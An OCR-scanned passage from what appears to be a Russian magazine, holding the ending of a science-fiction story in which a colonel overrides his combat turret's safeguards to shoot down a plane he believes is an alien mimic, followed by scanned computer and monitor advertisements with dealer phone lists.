скольких сотнях метров от машины полковника, взметнув тучу гря- 
зи вокруг себя. Полковник удовлетворенно кивнул и произнес: 

- "Рыба-молот" - оператору. Задание выполнил. Цели поражены. 
Дефектов в опознании целей не выявлено. Разрешите следовать к 
ангару? 

Никакого ответа. Тишина в наушниках несколько удивила и оза- 
дачила. Кузнецов недоуменно поднял брови: 

- "Рыба-молот" - оператору полигона. Повторяю - задание вы- 
полнено. Имеются ли замечания по ведению огня? 

В наушниках зашипело. Оператор включился, но ничего не гово- 
рил. Спустя несколько секунд такого молчания полковник не вы- 
держал и с официального языка перешел на разговорный: 

- Какого черта?! Что там у вас происходит? 

- Оператор полигона - "Рыбе-молот". Задание выполнено на "от- 
лично". Поступили новые вводные. К полигону с северо-восточной 


стороны приближается реальная цель - четырехмоторный Ил-18. 
На все позывные ответил правильно, курс держит на запасной аэ- 
родром к востоку от военного городка. Одно "но" - тут его просто 
не может быть... 

Полковник напрягся. Здесь, над полигоном, аморфы не появля- 
лись ни разу - хотя должны были бы расценить это место как са- 
мую подходящую цель для атаки; ведь именно здесь разрабатыва- 
лось оружие, которое успешно использовалось против них. Вряд 
ли именно сейчас и здесь может случиться что-то незапланирован- 
ное. Но чем черт не шутит... 

- Боевая тревога, - сказал полковник и сам удивился отсутствию 
интонаций в голосе. Прозвучало это настолько обыденно, что опе- 
ратор тоже не сразу среагировал. Вдоль позвоночника пробежала 
волна колючих мурашек - костюм выполнял точечный массаж для 
мобилизации нервной системы. Стволы вновь были наизготовку, в 
уши ворвался рокот моторов "Ила". 

Немного покрутив машину на месте и разбрызгав грязь, 
Кузнецов добился того, что весь курс самолета пролегал у не- 
го над горизонтом. Прицелы взяли его в захват; ничего осо- 
бенного, обычный самолет цвета хаки, грузопассажирская ар- 
мейская рабочая лошадка. Российский флаг, бортовой номер, 
в кабине два пилота, лица плохо различимы из-за захода про- 
тив солнца. 

- Оператор полигона - борту "шестьдесят два тринадцать". Цель 
вашего нахождения в закрытом секторе воздушного пространства? 

- Борт - оператору, - прозвучал бодрый голос откуда-то с небес. 
- Продовольствие для команды полигона, рейс незапланированный 
ввиду того, что груз скоропортящийся - фрукты. Приятного аппети- 
та! 

- Спасибо, - голос оператора, до этого сухой и требовательный, 
потеплел. - Отведаем ваших фруктов, только не растрясите. Мяг- 
кой посадки! 

А полковник, застывший в кресле восковой куклой, не замечал, 
как перед глазами цветными кругами проносятся модели самоле- 
тов, когда-либо участвовавших в полиморфной маскировке при- 
шельцев. Он отрешился от происходящего; даже контрольные 
сигналы с костюма, призванные приводить в чувство при отсутст- 
вии активности, не доставали его. Полковник впился глазами в 
пилотскую кабину "Ила", в которой угадывались два человека, 
держащие руки на штурвалах. В этот момент просмотр ассоциа- 
ций закончился. 

Перед глазами появилась надпись, продублированная в наушни- 
ках все тем же приятным женским голосом: 

- Цель опознана как мирная. Огонь не открывать. 

- Нет, - шепнул полковник. - Огонь... Это... Огонь... 

- Оператор полигона - "Рыбе-молот". Ваши команды не прохо- 
дят ввиду их ошибочности. Костюм отследил ваши реакции - вы 
опознали наш самолет АБСОЛЮТНО правильно. Даю добро борту 
"шестьдесят два тринадцать" на проход над полигоном. 

- Принял, - ответил все тот же молодой задорный голос. - До 
встречи на ужине! 

- Удачи, - усмехнулся оператор. 

- Нет, - упрямо говорил Кузнецов. - Они... Это обман. 

- "Рыба-молот", возвращайтесь в ангар... 

Полковник беспомощно взмахнул руками, ожидая реакции авто- 
матики. Ничего не произошло. Оператор был, судя по всему, 
встревожен поведением Кузнецова и дистанционно влиял сейчас 
на боевой компьютер. Контрольные огни на турели погасли, CTBO- 
лы кивнули и встали в походное положение - вертикально в зенит. 

- Я ОШИБСЯ! - закричал Кузнецов. - Я ОШИБСЯ! Надо атако- 
вать! Огонь! 

Сердце вдруг ударило изнутри в грудную клетку, словно пыта- 
ясь вырваться на свободу; потом сжалось до размеров теннисно- 
го мячика - полковник дико закричал от боли, одновременно пы- 
таясь освободиться от эластичного облегающего костюма. Боль 
не отпускала; все тело мгновенно покрылось крупными каплями 
холодного пота, заставляя костюм намертво прилипать к телу. 
Кузнецов кричал, кричал, кричал... Из его рта вырывались жуткие 
нечленораздельные звуки, тело сводило судорогой, но он продол- 
жал стягивать костюм, разрывая его сочленения, выдирая контак- 
ты - он видел перед собой только одну цель; он должен был спра- 
виться с ней во что бы то ни стало. 

Наконец обнаженное тело полковника оказалось на свободе. 
На секунду он крепко прижал руки к груди, словно пытаясь унять 


боль. Но потом тело рванулось в люк, наверх, на броню. Так он 
и выбрался в сумерки полигона - голый, сверкающий от пота, 
трясущийся от боли, крика и судорог. Оператор что-то орал в на- 
ушники, оставшиеся в капсуле - но полковник не обращал на это 
внимания. Слабеющей рукой он нашарил у основания турели 
блок управления - тот самый, который общался сначала с опера- 
тором, потом с костюмом полковника, и только потом с боевым 
алгоритмом. Вырвав из его недр, напичканных проводами, не- 
сколько контактов, он быстрым движением рассек кожу на пред- 
плечье о заусеницу люка, обнажил датчик и приложил к нему се- 
ребристую пластину. 

Новый приступ боли, крик, который заглушил жужжание серво- 
моторов, откликнувшихся на прямой контакт со стрелком. Турель 
зашевелилась, в замковой части открылись две рукоятки с не- 
сколькими кнопками, вспыхнули сигнальные лампы боевой готов- 
ности. 

Далеко отсюда, на крыше операторской башни, появился снай- 
пер со стационарной винтовкой и осторожно пополз по покатой 
крыше к леерам; приказ был однозначен - не допустить стрельбу, 
нейтрализовав сошедшего с ума полковника. 

Но Кузнецов успел. Он ухватился за рукояти, развернул стволы 
и, найдя на темнеющем небе подсвеченный сигнальными огнями 
самолет, нажал на гашетки. Стволы отозвались на это прикоснове- 
ние грохотом и россыпью огромных разлетающихся красных гильз. 
Длинные трассирующие нити протянулись к "Илу" и вонзились ему 
в крылья и хвост. 

- ВИТА-А-АЛЬКА! - кричал полковник, намертво вцепившись в 
пулемет. - ПРОСТИ МЕНЯ, ВИТА-А-ЛЬКА-А-А! 

И когда самолет вспыхнул в небе и превратился в яркий огнен- 
ный шар, расцветив окрестности в оранжевые тона - только тогда 


Генерал аккуратно уложил ор- 
ден в коробочку, протянул жене 
Кузнецова, постаревшей в одно 

мгновение лет на двадцать. 


полковник рухнул на броню, даже не заметив того, как ударился 
головой об основание турели. Страшная, нечеловеческая боль в 
груди затмила все - он выгнулся дугой, разгребая будто чужими 
руками теплые гильзы, быстро остывающие на ветру. А они звене- 
ли, осыпаясь с борта, звенели... 

- Прости... - в последний раз шепнул Кузнецов. Потом сжал в ру- 
ке горячую гильзу - и умер. 

И только оператор полигона да снайпер на крыше видели, как из 
огненного шара вывалился шляпкой вниз покореженный "гриб" и 
упал в рощу... 
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Генерал аккуратно уложил орден в коробочку, протянул жене 
Кузнецова, постаревшей в одно мгновение лет на двадцать. 

- Честь имею, - козырнул он ей. - Ваш муж был и останется для 
нас примером во всем... Простите меня. И не дожидаясь, когда у 
женщины сдадут нервы, он вышел на улицу; адъютант Кузнецова, 
сопровождавший его до квартиры, ждал возле машины. 

Генерал покачал головой: 

- До сих пор не представляю, как он решился... Зато теперь мы 
знаем, что аморфы могут имитировать все что угодно - вплоть до 
знакомых голосов... Ведь именно голос сына, раздавшийся из лже- 
самолета, заставил автоматику обмануться... 

- Но ведь он знал. Знал, что сын погиб, что скоро уже год... - на- 
чал адъютант, но генерал поднял руку. Прапорщик замолчал. Гене- 
рал с трудом решился произнести вслух то, о чем думал с того мо- 
мента, как узнал о смерти Кузнецова: 

- Он НИКОГДА не видел своего сына мертвым. НИКОГДА. 

- И... 

- Да. Никто... НИКТО и НИКОГДА не узнает, кто был там, в само- 
лете. 

Упали крупные капли дождя. Прапорщик с шумом раскрыл зонт 
и втянул голову в плечи... 
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процессора 

INVEL® PENTIUM® 4] 
с технологией ГГ 


Компьютер АРЕК PC GALACTIC построен на базе самого современного 
процессора INTEL® PENTIUM® 4 с технологией Hyper-Threading, 
который специально разработан для достижения максимальной 
производительности и обеспечивает одновременную работу с несколькими 
приложениями с высокими требованиями к вычислительным ресурсам: при 
развлечении — высочайшая реалистичность изображений и скорость отклика «=©—-s Www.dlel.ru 


при игре; потрясающее качество при воспроизведении цифровой музыки и 
при обработке цифровых изображений; при создании цифрового видео 
возможность применять спецэффекты и технологии доступные ранее только 
профессионалам 
Компьютер АРЕК PC GALACTIC повысит продуктивность работы 
и степень Вашего удовольствия 
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корпоративные и розничные продажи 


Белорусская (кольцевая), тел: 250-55-36, 250-44-76 


info@del.ru 
Розничные продажи: ® 
@ Савеловская, ВКЦ «Савеловский», тел: 788-00-38 
Шоссе Энтузиастов, КЦ «Буденовский», тел: 788-19-65 AEA 


Товар сертифицирован. Intel, Intel Inside Logo Pentium являются товарными знаками или зарегистрированными товарными знаками Intel Corporation или ee отделений в США и других странах. 
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FLATRON" F?00P 
Абсолютно плоский экран 
D V; Размер точки 0,24 мм 
2 7 7 В Частота развертки 95 кГц 
> ша ictoria Экранное разрешение 1600x1200 
(095) 288-6130, 288-6117 И$В-интерфейс 


г.Москва: Атлантик Компьютерс (095) 240-2097; Банкос (095) 128-9022; Березка (095) 362-7840; ДЕЛ (095) 250-5536; Инкотрейд (095) 176-2873; Инфорсер (095) 747-3178; 
КИТ-компьютер (095) 777-6655; Компьютеры и офис (095) 918-1117; Компьютерный салон SMS (095) 956-1225; ЛИНК и К (095) 784-6618; НИКС (095) 974-3333; 
Сетевая Лаборатория (095) 784-6490; СКИД (095) 956-8426; Техмаркет Компьютерс (095) 363-9333; Ф-Центр (095) 472-6401; Flake (095) 236-9925; ISM Computers (095) 319-8175; 
OLDI (095) 105-0700; POLARIS (095) 755-5557; R-Style (095) 904-1001; г.Архангельск: Северная Корона (8182) 653-525; г.Волгоград: Техком (8442) 975-937; 
г.Воронеж: Сани (0732) 733-222, 742-148; г.Иркутск: Комтек (3952) 258-338; г.Липецк: Регард-тур (0742) 485-285; г.Тюмень: ИНЭКС-Техника (3452) 390-036. 
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